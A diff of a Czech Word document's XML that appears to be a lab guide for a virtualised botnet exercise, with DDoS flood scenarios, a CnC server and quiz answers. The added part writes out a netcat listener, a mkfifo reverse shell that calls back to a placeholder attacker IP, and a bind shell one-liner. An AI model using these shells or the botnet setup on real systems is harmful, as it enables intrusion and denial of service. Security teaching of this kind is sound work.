-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">A samotné servery oběti, na kterých běží HTTP služba Apache a DNS služba Bind na překlad adresy z druhého serveru. Jak </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Boti</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> tak servery běží převážně na </w:t>
-      </w:r>
-      <w:r>
-        <w:t>U</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">buntu (dostupný z: </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId12" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hypertextovodkaz"/>
-          </w:rPr>
-          <w:t>https://ubuntu.com/download/server</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
+      <w:bookmarkEnd w:id="8"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>! - Tato část není potřebná k cvičení. Je tu jen ze zajímavosti, jak se konfigurovala síťová komunikace v této topologii. Pokud chcete dále pokračovat vedle nadpisu si můžete celou kapitolu „zabalit“.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Nadpis3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc192000150"/>
-      <w:r>
-        <w:t>Krok 1. Stáhnutí a virtualizace strojů</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="5"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>V uvedených lincích minule si stáhněte vždy jen jeden soubor. Kali a RouterOS jdou stáhnout rovnou jako import do VirtualBoxu, ale ubuntu server se musí stáhnout jako .ios soubor.</w:t>
+      <w:bookmarkStart w:id="9" w:name="_Toc192341161"/>
+      <w:r>
+        <w:t xml:space="preserve">Krok 1. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Stáhnutí</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a virtualizace strojů</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">V uvedených </w:t>
+      </w:r>
+      <w:r>
+        <w:t>odkazech</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> minule si stáhněte vždy jen jeden soubor. Kali a RouterOS jdou stáhnout rovnou jako import do VirtualBoxu, ale ubuntu server se musí stáhnout jako .ios soubor.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1168,7 +2393,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D3932E9" wp14:editId="2662ED49">
             <wp:extent cx="3391373" cy="1124107"/>
@@ -1185,7 +2409,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId16"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1252,7 +2476,7 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc192000151"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc192341162"/>
       <w:r>
         <w:t xml:space="preserve">Krok 2. </w:t>
       </w:r>
@@ -1265,7 +2489,7 @@
       <w:r>
         <w:t>ve VB</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkEnd w:id="10"/>
     </w:p>
     <w:p>
       <w:r>
@@ -1280,6 +2504,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38D1DF89" wp14:editId="66795A0B">
             <wp:extent cx="5020376" cy="1114581"/>
@@ -1296,7 +2523,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1389,11 +2616,11 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc192000152"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc192341163"/>
       <w:r>
         <w:t>Krok 3. Komunikace (routery)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="7"/>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:r>
@@ -1407,7 +2634,7 @@
       <w:r>
         <w:t xml:space="preserve"> (dostupný z: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId15" w:history="1">
+      <w:hyperlink r:id="rId18" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
@@ -1460,7 +2687,9 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="690B3354" wp14:editId="6DBD055D">
             <wp:extent cx="3753374" cy="1781424"/>
@@ -1477,7 +2706,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId19"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1519,6 +2748,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43C733DA" wp14:editId="4C1CFD59">
             <wp:extent cx="5220429" cy="1781424"/>
@@ -1535,7 +2767,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId20"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1651,6 +2883,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BAF4887" wp14:editId="74E372AD">
             <wp:extent cx="4873925" cy="1578534"/>
@@ -1667,7 +2902,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1690,7 +2925,9 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64D8F24C" wp14:editId="718A3052">
             <wp:extent cx="4917057" cy="4017797"/>
@@ -1707,7 +2944,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId22"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1730,6 +2967,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5832A8E5" wp14:editId="73E1BB5A">
             <wp:extent cx="4916805" cy="3228454"/>
@@ -1746,7 +2986,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1788,7 +3028,9 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AF962B8" wp14:editId="5C4D1418">
             <wp:extent cx="3134162" cy="1914792"/>
@@ -1805,7 +3047,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1827,13 +3069,2629 @@
       </w:r>
     </w:p>
     <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="12" w:name="_Toc192341164"/>
+      <w:r>
+        <w:t xml:space="preserve">Část </w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="12"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Příprava Scénářů</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Krok 1. Připojení na CnC server</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Jak jde vidět z topologie, musíme nějak spravovat x </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>botů</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> k útoku. Na to nám slouží CnC server, který se bude chovat jako taková přeposílací jednotka </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>payloadu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (scriptu), který budeme spouštět v našem botnetu.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Na to abychom mohli upravovat co se bude posílat a kdy, se můžeme například vzdáleně připojit k tomuto serveru ze stroje útočníka a udělat co je potřeba. Jelikož chceme použít shell, tak máme dvě </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>varianty</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> které můžeme použít:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Reverse shell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">nejběžnějším typem vzdáleného </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>shellu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, nejrychlejší, musíme ho spustit pomocí využití nějaké zranitelnosti, která umožňuje vzdálené spuštění kódu. U útočníka pak spustíme </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>listening</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> na portu a na serveru musíme spustit reverse shell script.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Ú:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lvnp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>&lt;port&gt;“</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>S: „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>f;mkfifo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>f;cat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/f|/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -i 2&gt;&amp;1|nc </w:t>
+      </w:r>
+      <w:r>
+        <w:t>&lt;naše IP adresa&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>&lt;port&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> &gt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/f</w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Bind shell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">funguje opačně jak reverse shell, my se budeme připojovat na server, kde už bude </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">muset </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">běžet </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>listening</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> script. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Ú:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;IP adresa serveru &lt;port&gt;“</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>S: „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>f;mkfifo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>f;cat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/f|/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bash</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -i 2&gt;&amp;1|nc -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lvp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;port&gt; &gt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/f</w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Příklady </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>one-linerů</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">například na </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>InternalAllTheThings</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Otázka 2.1: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Jeliko</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ž se chceme z útočníkova stroje připojovat do CnC serveru, vždy když chceme, jaký druh </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">vzdáleného </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>shellu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> bychom měli použít?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>Bind shell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Zatím si spustíme tedy R1, R2, R3, Kali a CnC server. Na CnC serveru bychom měli mít hned v našem Debian účtu </w:t>
+      </w:r>
+      <w:r>
+        <w:t>vše potřebné pro oba scénáře</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> jen ne naše scripty na HTTP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>flood</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> či TCP SYN </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>flood</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2251FE41" wp14:editId="7AB42B9B">
+            <wp:extent cx="6395085" cy="283210"/>
+            <wp:effectExtent l="0" t="0" r="5715" b="2540"/>
+            <wp:docPr id="965477713" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="965477713" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6395085" cy="283210"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Zároveň, jelikož už jsme ve </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>stavu</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> kdy máme zkonfiskovaný server a předělané scripty, tak se musíme kouknout přes jaký port se budeme připojovat na CnC server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="013DC827" wp14:editId="3A342ABA">
+            <wp:extent cx="5658640" cy="247685"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="332793043" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="332793043" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId26"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5658640" cy="247685"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Otázka 2.2: Přes jaký port se budeme připojovat, když náš script je ve bind.sh?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>9444</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Krok 2. Stahování payload souboru na CnC server</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Na Kali </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">se ověříme, že </w:t>
+      </w:r>
+      <w:r>
+        <w:t>payload soubory</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> máme ve /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>home</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kali</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/ (měli by se jmenovat payload_http_check.py a payload_tcp_check.py) a otevřeme dva terminály, na jednom zapneme http server a na druhém se připojíme na CnC server (jako kdyby CnC server byl vzdálený)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19306FAA" wp14:editId="5EED0AE3">
+            <wp:extent cx="5462546" cy="2028215"/>
+            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
+            <wp:docPr id="99292526" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="99292526" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId27"/>
+                    <a:stretch>
